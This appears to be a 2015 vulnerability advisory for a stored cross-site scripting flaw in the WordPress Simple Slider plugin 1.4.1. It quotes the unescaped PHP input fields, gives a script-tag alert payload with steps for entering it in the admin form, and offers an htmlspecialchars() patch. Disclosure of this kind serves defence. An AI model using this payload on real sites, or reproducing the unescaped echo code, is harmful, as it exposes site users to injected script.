Wordpress WP Slider Plugin Cross Site Scripting

2015-08-19
ID: 81233
CVE: None
Download vulnerable application: None
######################
# Exploit Title : 
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-slider-ssp/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link :
https://downloads.wordpress.org/plugin/simple-slider-ssp.1.4.zip
# Version : 1.4.1
######################
# Vulnerable File :
views/options_meta_box.php (Edit and Add Silder)

######################
# Vulnerable Codes :
108:<input type="text" style='width: 80%'
name="slider_options[height]" value="<?php echo
$slider_options['height'] ?>"  />
142:<input type="text" style='width: 80%' name="slider_options[width]"
value="<?php echo $slider_options['width'] ?>" />
192:<input type="text" style="width: 80%"
name="slider_options[cycle_speed]" value="<?php echo
$slider_options['cycle_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp' );
?>
211:<input type="text" style="width: 80%"
name="slider_options[animation_speed]" value="<?php echo
$slider_options['animation_speed'];  ?>" /> <?php _e( 'Seconds', 'ssp'
); ?>

######################
# Exploit :
For test Cross site scripting can use this code in all of the above inputs.
"><script>alert(/xss/)</script><
1- http://localhost/pentest/wordpress/wp-admin/edit.php?post_type=ssp_slider
(add new)
2- Complete Height , Width , Cycle speed and Animation speed forms
with above code.
3- Click on create slider
4- Boom (xss alerts) :)
######################
# Patch:
To fix this vulnerability you use htmlspecialchars() function .
<input type="text" style='width: 80%' name="slider_options[height]"
value="<?php echo htmlspecialchars($slider_options['height']) ?>"  />
And other lines, too.
######################
# Discovered By : Ehsan Hosseini.
# Spc Tnx : H_SQLI.EMpiRe , Channel , Amir-Mahmod and All Ashiyane Members.
######################
1-4-2 (www01)